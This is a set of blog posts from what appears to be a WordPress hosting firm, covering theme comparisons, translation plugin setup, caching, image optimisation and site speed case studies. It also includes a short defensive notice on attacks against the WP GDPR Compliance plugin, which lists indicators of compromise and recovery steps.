we solved the Facebook Like Box.

The result

after optimization

Homepage now has 62 components totaling 672.6K - compared to 113 items totaling 2.5 MB = an improvement of 73%.

The average load speed is now 1.5 seconds - compared to 6.99 seconds = improvement of 78%.

If you need a faster WordPress website, don’t hesitate to get in touch with us and see what we can do to help.

Astra Pro vs GeneratePress Premium

Elena Chira — Thu, 07 Feb 2019 00:00:00 GMT

I’m a fan of Genesis Framework, been using it for 3-4 years now. But one of our clients told me to take a look at GeneratePress or Astra. They are great themes and are not as bloated as I might think.

Usually, the themes catered to beginners come with hundreds of options. They are not very lightweight but let’s not assume anything and test.

I’ve bought the licenses for both themes and set up some demo sites. I’ve imported some content from my wife’s fashion blog.

Initial tests

Using GTMetrix, the initial tests look like this:

GeneratePress performance

A WordPress install with GeneratePress Premium has 33 KB and makes 13 requests. The load time is 0.7 seconds (I chose the best time from 3 tests).

Astra performance

A WordPress install with Astra Pro theme has 92 KB and makes 14 requests. The load time is 0.9 seconds (best out of 3 tests).

Both are plain WordPress installs, no plugins, but I did install Gutenberg. I think it’s important to test with Gutenberg activated since it’s going to be part of WordPress.

It looks like GeneratePress doesn’t load jQuery and that’s the reason it has less KB that Astra.

Building a real website

That’s great, but I want to see what’s going on when I try to build a real website.

So I’m going to install more plugins, add images and try to build a masonry style website, just for the sake of it, to have a clear goal.

The desired end result

Also, I will make some small tweaks, like I would when building a real website. That means removing the wp-emoji and wp-embed JS, optimizing images and I’m using the Litespeed Cache plugin to optimize CSS and JS and to set up caching.

Customize

Let’s start customizing, doing the exact same changes on both sites:

setup a logo and site icon
setup the layout
setup the colors

I like the simplicity of working in the WordPress Customizer. It’s a great direction where WordPress and the WordPress themes are going, but it’s not 100% for me.

I like to set up some things in the Customizer. But to design every aspect of the website there - too many mouse clicks, I can feel the Carpal Tunnel Syndrome kicking in.

It feels redundant, I have to set the same color in 3 or 4 different places - the main menu, the sticky menu, the mobile menu.

It’s the same menu, why so many clicks to set one color?

I would be more comfortable in a text editor ( I use Atom) doing a search and replace for the HEX color code. But this proves that the themes, both Astra and GeneratePress, are not made for people like me who are comfortable in a text editor and know what HEX is.

Single post

They are made for people who want to build a website very easy, just by clicking around and setting options.

And with this premise in mind, I think that Astra is better because I failed to accomplish what I wanted with GeneratePress.

The thing missing from GeneratePress is the possibility to customize the single post content width. You have to add custom CSS to get it the way you want.

This image below is how I wanted to look. Astra gets it almost right. I wanted a 700px width and there’s a limit in Astra to 768px - but it’s ok.

Astra single post

In GeneratePress, on the other hand, the single post looks like the image below. The content spans to the full width of the container. You can’t set it in the Customizer, you have to add custom CSS.

Also, Astra has better styling for the navigation as well as the single post navigation, its default styles are good enough for me. In GeneratePress I would need to add more CSS to style it the way I want.

So, if the goal is to build a website without touching code, GeneratePress fails there.

GeneratePress single post

Astra also has better styling for the navigation as well as the single post navigation, its default styles are good enough for me. In GeneratePress I would need to add more CSS to style it.

Overall, both are nice themes, great for beginners starting out with WordPress.

Conclusion

From a user experience perspective, I am slightly inclined towards Astra Pro. It felt like less work for me to get it to look like I intended. It has more options and more fine controls, like spacing & custom widths.

The masonry effect is better in GeneratePress though. It changes from 3 columns to 2 then to 1 as the viewport becomes smaller. In Astra, it changes from 3 columns directly to 1 column. Minor detail, but when you want your website to be pixel-perfect it matters.

From a performance perspective, GeneratePress seems better, it has smaller CSS and JS files and makes fewer requests.

One thing that I don’t know how to evaluate is all that inline CSS that both themes generate, Astra more than GeneratePress.

How much inline CSS is too much? If you have data about how this might impact speed, let me know in the comments section.

I can’t see a clear winner, the results are conflicting. Sometimes Astra is faster than GeneratePress, sometimes is the other way around.

The loading speed is pretty much the same for both test sites, around 1.1 seconds.

I’ve tested with GTMetrix, Pingdom Tools and the Chrome DevTools (cache disabled) with both demo websites on the same shared hosting account.

What do you think? What theme do you prefer?

Translate a WordPress site into multiple languages

Elena Chira — Tue, 13 Nov 2018 00:00:00 GMT

Funny enough, although I’ve been working with WordPress since 2009 I never needed to translate my websites into multiple languages.

But I always got questions from clients to recommend a way to translate their sites. So I’ve tested the likes of WPML, Babble, qTranslate or Polylang but was never quite sold on any of them.

In 2017 I saw a demo of TranslatePress at WordCamp Bucharest and I was immediately drawn to the ease of use. I knew the team behind the plugin from WordCamp Romania 2014. They’re cool guys, and that gave me the nudge to test more in depth.

TranslatePress is a WordPress plugin that lets you translate your site, or parts of it, easily – directly from the front-end. It works similarly to a visual page editor in that regard, I felt like working in the WordPress Customizer.

Since more and more sites are catering to an international audience, you can’t afford not to have multilingual content anymore. In line with this, it’s no wonder the plugin’s popularity and financial gain have grown exponentially in such a short time.

Put simply – if you’re translating your site, then you should, by all means, be using TranslatePress.

Install and setup TranslatePress

You can install TranslatePress by searching for it in the WordPress Dashboard > Plugins interface and installing it and activating it from there.

The setup process is straightforward:

Add a second language from the plugin settings: I’m using Romanian
Click Translate Site to start translating your site content, directly from the front-end

You can also access the translation interface from the top admin bar. Once opened, hover over strings in the right side and translate them one by one.

The blue icon strings are user-generated (like the page title or the content of a post), while green icon strings are gettext strings from your plugins and theme.

You can access the TranslatePress plugin settings in the administrator area in the menu under Settings > TranslatePress.

It can also be accessed both from the frontend and administrator area from the Admin Bar under the newly created button Translate Site, the Settings drop-down.

Set default language

You can select the original language from the drop-down on the plugin Settings page. By default, the language is inherited from the WordPress language that you can set up on install or change from Settings > General.

Set translation languages

You can select the languages in which you wish to translate your website. Select the language from the drop-down and click the Add button then Save Changes.

Actions you can perform on the languages:

edit the slug of the language that will appear in the URLs of the site from the Slug input
make the language active for the visitors of the site or only available for translation for the administrator by checking or unchecking the Activate checkbox (only in the PRO Version)
remove the language by clicking the Remove link (this will not delete the existing translations from your database)
rearrange the order of the languages with the drag-drop interface. This will determine the order in the language switcher floater and shortcode.

Display languages in their native names

Select Yes if you want languages to display in their native names. Otherwise, they will be displayed in English.

Use subdirectory for the default language

Select Yes if you want to add the language slug in the URL for the default language. For example, www.myhomepage.com/en/ instead of www.myhomepage.com when visitors are viewing the site on its default language (EN).

Instead of directing the user to a predefined language, you can also redirect them to their language using the Automatic Detection of User Language add-on.

Force language in custom links

Select Yes if you want to force custom links without language encoding to add the language slug in the URL for the default language.

Google Translate

Enable or disable the automatic translation of the site with Google Translate. Existing translations will be not be affected.

Note: Not all languages support automatic translation. You should consult the supported languages list.

Google Translate API Key

Here you can enter the Google Translate API key. Visit this link to see how you can set up an API key.

Language Switcher

You have three options to display language switchers on the site:

Shortcode (Use the [language-switcher] shortcode on any page or widget.)
Menu item (Go to Appearance > Menus to add Language Switcher Languages in any menu.)
Floating language selection (Have a floating dropdown following the user on every page.)

For all the available language switchers you have the following options:

Flags with Full Language Names (default)
Full Language Names
Short Language Names
Flags with Short Language Names
Only Flags

Translating has never been easier

That’s what I like about this plugin, you can translate directly on the page, and it’s so intuitive that any previous skills are not required. TranslatePress integrates itself into your existing theme settings, so not only you won’t have to change anything to use it, but there should be no conflicts with anything you’re already using.

TranslatePress is also integrated with the popular Google Translate, and all you’ll need is a Google API key.

Paid add-ons

The plugin has a freemium model, you get the plugin for free and you can buy some premium add-ons:

SEO pack
Multiple Languages Addon - Support for 221 languages Editorial Control
Translator Accounts Addon - Create or allow existing users to translate the site without admin rights.
Browse As User Role Addon - View content that is visible to a particular user role.
Navigation Based on Language Addon - Configure different menu items for different languages.
Automatic User Language Detection - Redirect visitors to their language preference

Pricing

The detailed pricing table with everything that each tier provides can be found on the official website.

Security issues in the WP GDPR Compliance plugin

Elena Chira — Fri, 09 Nov 2018 00:00:00 GMT

Last night we got an email from a friend saying he found some new users with administrator privileges on some of his WordPress websites and asked us to check it out.

We started to investigate, and it seems that the websites had a thing in common - the WP GDPR Compliance plugin.

It looks like there is a vulnerability in the plugin and there have been a series of attacks on sites using this plugin.

There are different stages of infection:

administrator users are being created
files have been modified
redirection to Russian website

We recommend you check whether new users with the name “t3trollherten”, “t2trollherten” or “trollherten” have recently appeared on your site.

After creating the users, attackers modified the files of other PHP scripts (plugins). For example, we found modified PHP files in the Akismet plugin folder.

On some websites, we found this Pastebin URL in wp_options at siteurl.

https://pastebin.com/raw/V8SVyu2P?

At this point the website starts to break, you get database connection errors or your website is redirected to another site, sometimes Russian.

How to recover from the hack

If there are no users you should be fine, your website was probably not attacked.

To prevent that from happening update the WP GDPR Compliance plugin to the latest version, the developers have fixed the vulnerabilitiesies in the 1.4.3 release.

Ideally, keep up-to-date all WordPress plugins and themes to prevent possible security issues like this.

If you find these users, there’s a chance they didn’t get to infect the site but you can’t know for sure so it’s probably best to restore from a backup, then update the WP GDPR Compliance plugin.

Also, if you have a security plugin like the Defender Pro, scan your WordPress instance to see if it’s clean.

If you can’t restore or you don’t have a backup, you’ll have to clean the website manually:

delete the malicious users from the database
delete all PHP and JS files (only keep wp-content/uploads)
reinstall WordPress and the themes and plugins you use

If you want to avoid these situations, consider switching from shared hosting to an expert WordPress hosting. None of our managed WordPress hosting customers were affected, all affected websites were on shared hosting.

Not to say it is because of hosting but on managed hosting, you get proactive monitoring, managed updates, and you can avoid this type of situation.

When we identified what was going on, we immediately updated the plugin on our clients’ websites that had the vulnerable version and performed an automated scan.

We also have clients that host with us but we do not manage their websites, we don’t have access to their WordPress instances.

So we search the server to find the wp-gdpr-compliance folder in order to identify the clients that used the plugin. We emailed them, notifying the security vulnerability with instructions on how to check if their websites were hacked.

If you also need help, don’t hesitate to get in touch with us.

Case study: blog optimisation

Andrei Chira — Tue, 21 Aug 2018 00:00:00 GMT

1923.ro is a fan site dedicated to the Rapid Bucharest football club. You can find news and updates about the team, interviews with some of the players and you can also buy fan-made t-shirts.

Dragos (the site owner) has opted for our hosting solution to see if we can solve some problems he had with this blog, namely the appearance of the white screen, the so-called WSOD (white screen of death) which occurs quite frequently when using WordPress.

WordPress white screen of death may be the result of several things:

WordPress reaches the limit of memory allocated to a PHP script
poorly written plugin or theme
a problem with server settings
unwanted characters in the theme functions.php or wp-config.php

Let’s see how we helped our football friends to have an error-free and faster WordPress blog.

Before

Before moving to our servers, the blog was loading in 3.6 seconds on average, had 108 requests and a page size of approximately 3800K of which 3404.5K were pictures.

Google Page Speed Insights gave an 80/100 score with the following recommendations presented:

optimize images
remove render-blocking Javascript and CSS in above-the-fold content
reduces server response time to under 200ms

It was clear that the pictures were the main problem but also the server that was hosting the blog was not the best.

Blog Optimization

We searched for very high-resolution pictures and resized them and used the Smushit plugin to optimize all photos on the site.

We implemented Lazy Load - a WordPress plugin that loads gradually the images, which are displayed only when the user scroll.

Now, instead of loading 3MB of photos, it’s only about 780K.

We implemented a combination of page cache and database cache to make WordPress work less, consume fewer resources, serve pages faster and being able to sustain higher traffic.

After

After optimizing images, setting lazy load and cache implementation, we improved the loading speed of the blog to 1.4 seconds from 3.60 seconds as it was initially.

Improved loading speed of blog

A new Google PageSpeed Insights test shows a score of 92 /100.

Google Page Speed score improvement

Other recommendations

Display excerpts and a thumbnail instead of full posts on archive pages.

That would make the pages smaller (KB wise).

Performance WordPress Plugins

Another problem is related to the Facebook plugin, a plugin that adds some social features to the site and that has a negative impact - 90.6 % of the loading speed of the site.

We think that this plugin was generating the errors but, unfortunately, almost all plugins that add Facebook comments that we tested had a negative impact on performance (some less, some more).

As a general rule, from our personal experience with comment plugins, it’s best to stick with WordPress default comments - it may not look great, but at least it’s not sabotaging your website.

There’s more in depth optimisation to be done, like removing render-blocking Javascript and CSS in above-the-fold content. If you build your website with a minimalist approach and don’t bloat it, this doesn’t make much of a difference but in some cases it might be worth the time to implement.

That’s about it. If you need a performance audit and optimization, please get in touch.

Manofmany.com simple optimization report

Andrei Chira — Wed, 28 Mar 2018 00:00:00 GMT

Manofmany.com is an Australian style magazine dedicated to men.

Everyday the team posts cool stuff in style, gadgets, tech, etc.

After a chat with them on Google+, we gave them this simple optimization report.

Loading time

Different tools show different data:

Chrome SEO toolbar - 7.43 sec
Pingdom Tools - 12.62 dec
GTMetrix - 9.86 sec
Webpagetest.org - 24.14 sec

Page size

Different tools show different data:

YSlow: 3096.5 bytes
Pingdom Tools: 4.0 MB
GTMetrix: 3.88 MB
Webpagetesst.org: 3.816 KB

I’m gonna use only one tool further, YSlow.

Components

Too many http requests: 51. 51 is not huge but it can be improved.

Javascript

There’s 15 js files, total size 627.1K:

https://apis.google.com/js/plusone.js - 22.9 k
http://platform.twitter.com/widgets.js - 80.7 k
http://www.google-analytics.com/ga.js - 37.3 k
http://edge.quantserve.com/quant.js - 5.8 k
http://manofmany.com/wp-content/themes/clearly/library/js/modernizr.full.min.js - 13.6 k
http://manofmany.com/wp-content/themes/clearly/library/js/jquery.fitvids.js?… - 2.7 k
http://manofmany.com/wp-content/themes/clearly/library/js/scripts.js?… - 7.1 k
http://s3.buysellads.com/ac/bsa.js - 16.1 k
http://s3.buysellads.com/r/s\_74ca33a0013c12e56d70fc5c06b96646.js?… - 2.1 k
http://pagead2.googlesyndication.com/pagead/show\_ads.js - 13.9 k
http://manofmany.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?… - 15.1 k
http://manofmany.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?… - 6.9 k
https://apis.google.com/…/cb=gapi.loaded\_0 - 129.7 k
http://manofmany.com/wp-includes/js/jquery/jquery.js?… - 93.6 k
http://connect.facebook.net/en\_GB/all.js#xfbml=1&appId=363084773773073 - 178.9 k

JQuery.js could be loaded from Google Library for better speed.

The biggest issue is with the social media JS files; they’re definitely not using the best plugin for social media sharing. It could be done with a single JS of 38.5 k or even scriptless.

That’s going to shave off 249.6K and leave the JS number at 11. It’s a considerable improvement on page size.

CSS

There’s 12 css files with a total size of 63.7K.

The size is not that much but the number is kinda high.

3 files can be combined into one: the theme styles.css and the plugins Easy Columns and Contact Form.

The rest are fonts loaded from Google Library so the question here is : do you really need 9 fonts?

Usually, you should be using 2 fonts: one for headings and one for body text.

PT Sans and Open Sans are not that different so you could be using just one of the 2.

Lora and PT Serif - same as above, use only one or just use Georgia (it’s a beautiful websafe font).

Nixie One - I don’t see it in use on the site.

For fonts that are used rarely it doesn’t make sense to load them every time, just use system fonts: Georgia, Arial, Courier.

That is gonna improve the requests from 12 to just 3-4, size improvements are not that big but it adds up.

Images

That’s the biggest issue of the website with the biggest impact on speed: 18 images, total size of 2597.5 K.

That is huge; they need to optimize the pictures before uploading them.

The biggest image on site has 420K and a simple smush.it shows that it can be improved by 27.6%, that’s 104K right there.

If we can improve all by 25%, that’s over 600K weight loss.

Solutions:

1. Optimizing images

Use Photoshop and Save for the web at 60% and progressive checked. If your visitors use chrome, firefox or IE9 progressive jpgs load superfast. For the rest, it will be a little slower than normal jpgs.

Otherwise just Save for the web at 60%-80% and optimized check. This saves normal jpgs.

After that proceed with uploading images to Wordpress.

No Photoshop?

Use jpegmini.com to optimize images before uploading or just use a WP plugin to do it automatically on upload.

2. Serving images

Serve static content from a cookieless domain & parallelize downloads across hostnames.

Those 2 things can be achieved by loading images from a cookieless subdomain, something like images.manofmany.com.
Now, the browser can download multiple items at once improving the speed of the website.

Lazy loading

This means images will load one-by-one and visible to the users only when necessary.

They are loaded when they are visible in browser viewport only.

By loading only images above the fold, the speed gain is significant.

Other stuff you can do

- browser caching
- combine js ( if possible)
- add expires header
- compress with gzip
- using etags
- Profiling plugins to see which impacts the loading time and replace with better plugins
- Use code in functions.php instead of plugins for simple stuff like loading Google Fonts
- solve 404 errors
- minimize redirects
- load javascript at the bottom of the page
- you can use just 5 posts per page instead of 10
- you could use smaller pictures like thumbnails but that means interfering with the design

Conclusion

Most of it, it’s just simple things that can make a huge impact.

For a more advanced optimization, we should look at the theme and plugins and check if there are performance issues.

How to optimize images for the web

Andrei Chira — Sun, 18 Feb 2018 00:00:00 GMT

One of the factors that might slow down your website is using big photos that are unoptimized for the web.

Sometimes when people try to publish something quickly, they upload photos directly from their photo cameras, at very high resolution, pictures that weight as much as 4-5 MB.

An optimized image has fewer kilobytes without any visible quality loss, and you should always optimize pictures without losing quality before or during uploading them to your site.

No matter if your site is WordPress or another platform you can optimize images for the web and make your website load faster.

One advantage of using WordPress is that you have plugins that can optimize images as you upload them to your site and also optimize in bulk existing images.

So, what are the best practices regarding photos?

Don’t lose quality

Follow your website’s objectives. Don’t optimize blindly just because some tool gave you a bad score. Tools don’t know your site goals.

If I had a fashion blog or a shop, I would show beautiful images; I don’t care what YSlow or Pagespeed Insights graded me.

Don’t get hung up on grades and scores, do what’s best for you and your visitors. Best to spend more on CDN to serve bigger, better images, than to over-optimize pictures and have an ugly website.

It might cost you visitors and money.

Don’t upload images bigger than you need

If your content width is 620px, then you should resize your images to 620px width before you upload them to your website.

If you want visitors to see a bigger image when they click on it, then you can use a 1024px width. Set one of the WordPress thumbnails to be 620px width and use that thumbnail on your page and link it to the bigger image.

You probably don’t need images higher than 1024px (that should be enough for most blogs) but what if you do?

In that case, you might consider uploading images at larger resolutions and use a CDN.

We’ll get more into detail about CDN in a minute.

Optimize images before you upload

You can optimize your images on your computer with Photoshop. Some people recommend you make your image a bit sharper with Smart Sharpen, Unsharp Mask, High Pass Filter, or whatever tool you like; Photoshop has multiple options.

I haven’t seen much of a difference (in KB) after sharpening, but I’m not a Photoshop master.

Resize the photo to the resolution you need on your website, use Save for the web, choose JPG, Quality between 60-80%, check Progressive then Save.

I recommend you use JPG unless you need transparency and need to use PNG.

If you don’t have Photoshop you can use these tools for optimizing:

Riot (Windows)
Imageoptim (Mac)
Jpegmini (online, Mac & Windows)
Kraken (online)
Compressor.io (online)

I use Jpegmini myself; I can still shave off another 5-10% even after optimizing with Photoshop first.

Or optimize during the upload

I don’t believe there’s one way that’s the best way to optimize images, if you don’t want to spend the time to optimize your photos on your computer before you upload them, you can choose to let a WordPress plugin do all the work for you.

There are many WordPress plugins you can use:

With these plugins, you can optimize images on upload, and also optimize the ones you already have uploaded.

I haven’t used them all, only WP Smush and ShortPixel, and I found ShortPixel to be excellent. It can shave off some KB even for images previously optimized with Photoshop and Jpegmini.

Another useful plugin is Imsanity.

If you have a multi-author site, then you need to control what images people upload. Set a max width, height, and quality. When a user uploads an image that is larger, the plugin will automatically scale it down to the configured size.

WP Smush Pro also does that.

Displaying images

Now that you have optimized images you can also improve the way you present these images on your website.

If you have a lot of photos on a page, like on a fashion blog, for example, you can take advantage of lazy loading.

That means your images will load only when they’re visible, as the visitor scrolls down.

You can use one of the following WordPress plugins for that:

I can’t tell you which plugin is better. You need to test because there might be incompatibilities with your theme. For example, lazy loading doesn’t work for featured images if you have a Genesis Framework theme.

Also, as I was testing lazy loading, it looked weird on mobile. There were blank spaces where photos should have been because pictures were not loading as fast as they did on desktop view.

Another thing you can do to speed up loading time is to serve images from a subdomain, like images.domain.com.

You need to create a subdomain from cPanel or whatever control panel your hosting company is offering and then setup WordPress to load media from that subdomain using the WP Original Media Path plugin.

I can write a detailed blog post for people who want to do that (if anyone requests it) but my recommendation is to use a CDN instead. It’s a much more straightforward solution.

Use a CDN

Cloudflare is super easy and free. You just change your domain nameservers to Cloudflare and activate (check orange cloud for DNS entries), and that’s it. Your static files (images, CSS, JS) will load from the Cloudflare CDN.

There are other CDN companies you can use, listed below. But I think Cloudflare is the easiest to implement:

Clean up after yourself

Every time you switch themes you leave behind a trail of unused thumbnails and database entries related to those images.

When switching themes, you can use the AJAX Thumbnail Rebuild plugin to rebuild thumbnails to fit your new theme.

Old thumbnails can be deleted from the server using one of the following plugins:

I recommend Thumbnail Cleaner because it’s fast. But it removes all your thumbnails, not just unused ones. After it deletes, you must use the AJAX Thumbnail Rebuild plugin to rebuild thumbnails that you need.

The unused thumbnails don’t affect your website performance. They just occupy space on your server. But, there are database entries related to those thumbnails, and it is a good practice to keep your database as clean as possible.

That’s what we’ll do in the next step - clean up the WordPress database.

next: database

WordPress caching: the complete guide

Andrei Chira — Sun, 18 Feb 2018 00:00:00 GMT

The easiest thing you can do to make your WordPress pages load faster is to use a caching plugin.

When you use a caching plugin, it creates a static version of your page when someone first visits that page. Next time someone visits it loads that static copy instead of getting the server to process all the PHP code and MySQL queries again.

There’s no need to get into more details & technical explanation about caching; you only need to know that caching is good and it helps your website to be faster & more scalable.

From my experience, using a cache plugin will not massively and magically speed up your website, but it will make it more scalable, especially in a shared hosting environment.

So, scalability, not speed, is the main advantage of caching, in my opinion.

There are a lot of WordPress caching plugins; I’m not going to list them all here. Some cache plugins have a lot of features but, from a cost-benefit point of view, page caching has the most significant impact on your website performance.

So, if you want to improve your WordPress website’s speed & scalability without doing too much configuration, page cache is the only feature you need.

My list of recommended WordPress caching plugins:

WP Super Cache

I recommend WP Super Cache because it is very user-friendly. It’s free and easy to get started with, even for a beginner.

To set up WP Super Cache, install it, activate it, and go to Settings > WP Super Cache and check “Cache on” then click the “Status update” button to enable the page cache feature.

Gzip compression and browser cache also help, you can enable them from the Advanced tab.

WP Rocket

It is a premium plugin, for one site it costs $39, but I think it is worth it if you want a complete caching solution that is easy to configure.

Plugin features:

page caching
gzip compression
browser caching
CDN support
Minification/concatenation of JS/CSS
Defer JS loading
Lazy Load
Cache preloading
Google Fonts optimization

I recommend this plugin because I like simple solutions. It requires almost no configuration, page caching is activated immediately, and that is enough to increase your website performance.

If you want more, you can play around with all the features, but if you just want simple page caching, WP Rocket is a good option.

WP Fastest Cache

This is a popular plugin among shared hosting customers; it has a lot of features:

page caching
minify HTML
minify CSS
gzip compression
browser caching
combine CSS & JS
CDN support

To set up the plugin, install it, activate it, and go to the WP Fastest Cache admin menu item.

In the Settings tab, you can enable the Cache System, Preload, Minify HTML, Minify CSS, Gzip, and Browser Caching options.

That would be enough to make your website faster & more scalable.

Hyper Cache

The plugin’s developer says it was specifically written to work in low-resources hosting environments, like shared hosting plans.

I found this to be true, on the shared hosting environment that I tested, websites that used Hyper Cache could sustain higher levels of traffic than sites with other caching plugins.

When it comes to scalability, the only thing better than Hyper cache was caching at the server level.

Hyper Cache doesn’t have all the features of other plugins, but it does very well what matters the most - page cache.

To set up Hyper Cache, install it, activate it, and go to Settings > Hyper Cache. There are many options you can configure but to keep it simple just “Enable compression” and “Allow browser caching.”

However, there’s one thing I don’t like about Hyper Cache; you have to add code manually in wp-config.php.

I’ve seen cases when people just install and activate the plugin, but the cache is not working because they missed the notice to insert the code manually.

Except for that bad user experience, Hyper Cache is an excellent plugin for shared hosting environments.

Cache Enabler

This is my recommendation if you have a shared hosting plan and the hosting company doesn’t offer caching at the server level.

It’s a simple plugin that does just page cache. You can combine it with Autoptimize to minify and concatenate CSS and JS.

Install, activate and forget it. Dead simple.

Why no W3 Total Cache?

Yes, I didn’t list the W3 Total Cache.

It is a massive plugin, has a lot of options, I think it works best if you’re an advanced user who has a VPS or a dedicated server. I don’t recommend using it on a shared hosting plan.

It’s not a bad plugin, but I’ve seen many clients configure it wrong. It’s best you choose a more straightforward solution unless you know what you’re doing.

Caching at server level

This is not something you can do yourself; the hosting company does it.

This solution, to cache at the server level, consumes fewer resources so it’s more efficient and will give you better performance than using a WordPress plugin.

Some shared hosting companies use Litespeed + LSCache, and you need to install the Litespeed Cache plugin. No other caching plugins necessary. In my opinion, this is the best solution for shared hosting, if you’re looking for cheap shared hosting for your WordPress website I recommend you choose a company that uses Litespeed and LSCache.

If you’re looking for better hosting than traditional shared, managed WordPress hosting companies handle caching themselves with Nginx FastCGI Cache, and you don’t need a caching plugin (or are not even allowed to install one).

If you want performance without setting up anything yourself, managed WordPress hosting is the way to go.

Conclusion

Whatever solution you choose, make sure it works correctly. Page caching is, as I’ve said at the beginning of the post, the simplest thing you can implement to speed up your website.

How to identify WordPress performance problems

Andrei Chira — Tue, 12 Dec 2017 00:00:00 GMT

So, you have a WordPress website, and you feel it loads too slow, and you would like to make it faster.

There are quite a few tools to test your website’s speed/performance:

You can use Pingdom Tools to see the loading time of the elements. For example, the long yellow line (wait) in the picture below might mean there’s a slow query, PHP takes too long, you don’t have a cache, or maybe the server responds too slow.

When it comes to images, the long green line (receive) might mean that the photo is too big and it could be optimized for the web to obtain a smaller size in KB which will result in a faster loading time.

YSlow is also an excellent tool to see how many elements the page is loading. It can give you information on how many CSS & JS files a theme or plugin loads.

You can also check if there are unused or redundant files, like in the example below.

The only tool I don’t like is Google PageSpeed Insights (just kidding, I don’t hate it 100%).

But it makes people crazy. It gets them all hung up on getting a high score, and they spend a lot of time trying to improve things that don’t matter that much.

I’ve seen websites with a low score (75-80) that load faster than sites with higher scores (90).

So don’t get hung up on scores, use it to get a glimpse of what might be wrong, and to improve WordPress performance go to the origin and look at your foundation.

Your foundation is the code (WP + theme + plugins).

To test it you can use these WordPress plugins:

P3 (Plugin Performance Profiler)

It’s an excellent way to find out if there’s a bad plugin, a plugin that uses too many resources or has a negative impact on loading time.

It is easy to use even for a beginner, but sometimes it’s not very accurate, or you can’t find anything that might be wrong.

In those cases, to see more detailed information about what’s going on under the hood you can use the Query Monitor plugin.

Query Monitor

The plugin is helpful to view debugging and performance information on database queries, hooks, conditionals, HTTP requests, redirects and more.

After you install the plugin, you will see a new admin bar menu with a quick overview of the current page. You can click on any item in the list, and it will take you to the footer of the page where you can see complete data.

It is a great plugin to see if the theme or a plugin makes too many queries if you have slow queries & more.

After you have identified what might be dragging down your website, it is time to fix the problems.

Conclusion

From a cost-benefit point of view 5 things matter the most:

well-coded themes & plugins
clean database
caching
optimized images
decent hosting

The most important is your foundation (the code), but we are going to start the other way around, with the most comfortable things to implement for end-users.